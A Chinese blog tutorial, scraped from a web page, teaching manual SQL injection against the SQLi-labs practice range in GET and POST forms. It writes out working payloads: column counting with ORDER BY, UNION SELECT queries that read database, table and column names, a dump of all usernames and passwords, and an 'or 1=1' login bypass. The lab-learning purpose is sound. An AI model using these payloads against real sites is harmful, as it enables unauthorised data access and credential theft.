首页 > 数据库 >入门级 SQL 注入实战!

入门级 SQL 注入实战!

时间:2024-06-08 15:32:43浏览次数:24  
标签:实战 users union 入门级 concat SQL id select

SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战!

一、实战准备

安全测试靶场:SQLi-labs

工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具

二、SQL注入思路

1、判断是否存在SQL注入漏洞

2、猜解SQL查询语句中的字段数

3、获取当前数据库

4、获取数据库中的表

5、获取表中的字段名

6、获取指定字段的数据

三、SQL注入实战-Get场景

进入SQLi-labs的Less-1关,输入id的值

1、id=1' ,发起请求,返回SQL语法错误

图片

2、id = 1'--+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞

图片

3、判断当前表的字段数

select * from users where id='1' order by 1; 该语句中order by 1为按第1列的数据进行排序。

输入 id=1' order by 3 #,回显数据正常,表示当前查询表存在第3列数据。

图片

输入 id=1' order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!

图片

4、获取数据库库名

使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。

id=' union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。

图片

5、获取数据库的表名

id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #;获取到security库的所有表名。

图片

6、获取表中的字段名

id=' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #;其中,如果不支持'users'单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。

图片

7、获取表中需要的数据

id=' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users #;

可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。

图片

四、SQL注入实战-POST场景

进入SQLi-labs的Less-11关,输入Username、Password。

1、判断是否存在sql注入漏洞

在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。

图片

直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。

图片

2、判断当前查询表的字段数

通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:

图片

在burpsuite中分别修改数据,进行后续步骤的操作:

uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。

图片

3、获取当前数据库名

uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。

图片

4、获取当前数据库下的表名

uname=a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security')# &passwd=a&submit=Submit可以得到security数据库中所有的表信息

图片

5、获取表中字段名

uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password

图片

6、获取表中数据

uname=a%27 union select 1,group_concat(concat_ws('~',username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。

标签:实战,users,union,入门级,concat,SQL,id,select
From: https://blog.csdn.net/suruoxun/article/details/139546892

相关文章

  • NoSuchModuleError: Can‘t load plugin: sqlalchemy.dialects:clickhouse解决方案
    NoSuchModuleError:Can'tloadplugin:sqlalchemy.dialects:clickhouse解决方案:全面解析问题概述当您使用SQLAlchemy连接ClickHouse数据库时,遇到NoSuchModuleError:Can'tloadplugin:sqlalchemy.dialects:clickhouse错误时,这意味着无法加载ClickHouse方言插件。......
  • MaxKey本地运行实战指南
    MaxKey本地运行总结概述开发环境准备主页传送门:......
  • Springboot计算机毕业设计疫情社区报备小程序【附源码】开题+论文+mysql+程序+部署
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景随着新冠疫情的全球蔓延,社区成为疫情防控的第一道防线。传统的人工报备方式不仅效率低下,而且难以实时追踪居民的流动情况,给疫情防控带来了极大的挑战......
  • Springboot计算机毕业设计疫情蔬菜供给系统演示录像2022【附源码】开题+论文+mysql+程
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景2022年,全球仍受到新冠疫情的深远影响。在疫情期间,人们的生活方式和消费习惯发生了显著变化,尤其是在食品采购方面。蔬菜作为日常生活的必需品,其供给稳......
  • (Java微服务项目实战)预付卡支付系统技术架构-发卡平台交易管理模块系统设计
    加入知识星球从0到1完成3个大型项目(从需求->系统设计->开发->再到生产环境部署)1项目介绍通过预付卡系统项目实战,**开发和产品设计人员能够对整体支付业务做到深入理解,**掌握各技术栈具体的业务应用场景,大型企业级项目业务分析、系统设计、代码实现的核心流程。并掌握......
  • 【免费Web系列】JavaWeb实战项目案例七(项目结束)
        这是Web第一天的课程大家可以传送过去学习 http://t.csdnimg.cn/K547r  登录认证在前面的课程中,我们已经实现了部门管理、员工管理的基本功能,但是大家会发现,我们并没有登录,就直接访问到了Tlias智能学习辅助系统的后台。这是不安全的,所以我们今天的主题就是登录......
  • 保姆级 | MySQL的安装配置教程(非常详细)
    一、下载Mysql官网步骤MySQLhttps://www.mysql.com/进入官网首页 点击DOWNLOADS 点击MySQLCommunity(GPL)Downloads»点击小页面直接进入MySQL::DownloadMySQLInstallerhttps://dev.mysql.com/downloads/installer/点击“Download”下载最新版本,其他版本......
  • 数据库镜像 (SQL Server)操作模式
    数据库镜像会话以同步操作或异步操作运行。在异步操作下,事务不需要等待镜像服务器将日志写入磁盘便可提交,这样可最大程度地提高性能。在同步操作下,事务将在伙伴双方处提交,但会延长事务滞后时间。有两种镜像运行模式。一种是高安全性模式,它支持同步操作。在高安全性模式下,当会......
  • 数据库镜像 (SQL Server)
    数据库镜像是一种提高SQLServer数据库的可用性的解决方案。镜像基于每个数据库实现,并且只适用于使用完整恢复模式的数据库数据库镜像的优点数据库镜像是一种简单的策略,具有下列优点:提高数据库的可用性。发生灾难时,在具有自动故障转移功能的高安全性模式下,自动故障转移可快......
  • Springboot计算机毕业设计疫情防控平台微信小程序【附源码】开题+论文+mysql+程序+部
    本系统(程序+源码)带文档lw万字以上 文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景:在当今全球化和信息化的时代背景下,疫情的快速传播对社会稳定和人民生命健康构成了严重威胁。特别是在移动互联网高度发达的今天,如何利用科技手段有效......